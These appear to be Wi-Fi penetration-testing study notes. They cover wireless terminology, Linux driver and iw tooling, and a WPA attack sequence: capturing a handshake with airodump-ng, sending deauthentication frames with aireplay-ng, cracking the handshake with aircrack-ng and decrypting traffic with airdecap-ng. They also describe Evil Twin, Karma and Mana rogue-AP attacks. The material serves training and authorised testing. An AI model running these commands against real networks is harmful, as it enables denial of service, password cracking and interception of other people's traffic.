Resources
- https://github.com/koutto/pi-pwnbox-rogueap/wiki
- https://github.com/dh0ck/Wi-Fi-Pentesting-Cheatsheet/tree/main/Wifi/cheatsheet
Terminology + Acronyms
- AP: Access Point
- STA: Station
- BSS: Basic Service Set (AP + STA)
- DS: Distribution System (Wired Network)
- ESS: Extended Service Set (2+ wireless APs)
- WDS: Wireless Distribution Systems (DS over Wi-Fi)
- Wireless Bridging: Only WDS APs can communicate
- Wireless Repeating: STA + WDS APs can communicate
- IBSS (Ad-Hoc): Independent Basic Service Set (STA + STA without AP)
- Mesh Networks: Join 2+ Wi-Fi AP to make a single network
- Wi-Fi Direct: Direct, single-hop communication for printing, file sharing etc.
- Monitor Mode: State of Wireless device to capture raw 802.11 frames and packet injection
- BSSID: MAC Address of the AP
Resources
- https://reconshell.com/wireless-penetration-testing/
- https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Cards%20and%20Chipsets
Updating Airodump database
airodump-ng-oui-update
Loading and Unloading Wireless Drivers
sudo airmon-ng // reveals wireless device drivers + chipset
sudo lsusb -vv // reveals system USB devices
## Display driver settings (e.g. ath9k_htc)
sudo modinfo [driver_name]
## Add or remove modules from linux kernel
sudo modprobe ath9k_htc blink=0 // loading driver and disable blink LED
sudo insmod # Manually loads driver from any path
## Modify parameters for modules
/etc/modprobe.d # May need to blacklist devices if two similar vendor drivers are present
## List all loaded modules + dependencies of each module
lsmod
## Remove modules and dependencies
sudo rmmod [modules] [dependencies]
Wireless Tools
## Deprecated utilities
iwconfig
iwlist
iwspy
iwpriv
# Wi-Fi Configuration Utilities
## Wireless devices information
sudo iw list
## Scan for Wireless AP in range (Managed mode only)
sudo iw dev wlan0 scan | grep SSID
## Determining Channel Number
sudo iw dev wlan0 scan | egrep "DS Parameter set|SSID:"
## Create new virtual interface [wlan0 device, interface add, name, monitor mode]
sudo iw dev wlan0 interface add wlan0mon type monitor
## Bring up the interface post creation
sudo ip link set wlan0mon up
## Inspect new virtual interface information
sudo iw dev wlan0mon info
## Capture wireless frames via tcpdump
sudo tcpdump -i wlan0mon
## Delete virtual interface
sudo iw dev wlan0mon interface del
## Display regulatory information [power limits, restricted frequencies, manufacturer restrictions]
sudo iw reg get
sudo iw reg set AU # Can be overwritten by AP advertising a country
/etc/default/crda # Modify REGDOMAIN to always set at boot
# Enable or Disable Wireless Devices [Wi-Fi, Bluetooth, Broadband etc.]
## Display all enabled wireless devices
sudo rfkill list
## Soft block/unblock device
sudo rfkill block [ID]
sudo rfkill unblock [ID]
sudo rfkill block all
sudo rfkill unblock all
mac80211 Wireless Framework
Replacing the ieee80211 framework (including Wireless Extension)
- https://wireless.wiki.kernel.org/en/developers/Documentation/nl80211
- Subset of nl80211 NetLink & cfg80211 Linux Kernel
- Linux drivers are now based on mac80211 framework
WPA Passphrase
- Generate a PMK
wpa_passphrase # add SSID and passphase
Cracking Authentication Hashes
# For WPA-PSK and WPA2-PSK, WPA3-PSK uses SAE (Simulataneous Authentication of Equals, Dragonfly handshake), not vulnerable to offline attacks. Opportunistic Wireless Encryption (OWE) also not vulnerable.
# Capture packets
sudo airodump-ng -c 3 -w wpa --essid wifu --bssid 34:08:04:09:3D:38 wlan0mon
# Deauthentication Attack
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon # 802.11w ignores unencrypted deauthentication commands
# Cracking Authentication Hash
aircrack-ng -w /usr/share/john/password.lst -e wifu -b 34:08:04:09:3D:38 wpa-01.cap
# Decrypting the traffic
airdecap-ng -b 34:08:04:09:3D:38 -e wifu -p 12345678 wpa-01.cap
Modern Day Wireless Attacks
Link: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
Rogue AP attacks
Evil Twin - to abuse connections to target ESSID, either to entice them to connect to our rogue AP, or jam and cause denial of service.
+ Captive portal attacks
Karma - inducing stations that are sending probes to connect to fake responses from the malicious AP (active probing usually does not occur anymore).
Mana - records probe requests in a hash table to track a devices PNL, responds to broadcast probe with all the networks in the device's PNL.
Loud Mode - records all probe requests in vicinity, and respond to broadcast with everything that is recorded.
Known Beacon Attack - effectively brute-forcing the station's PNL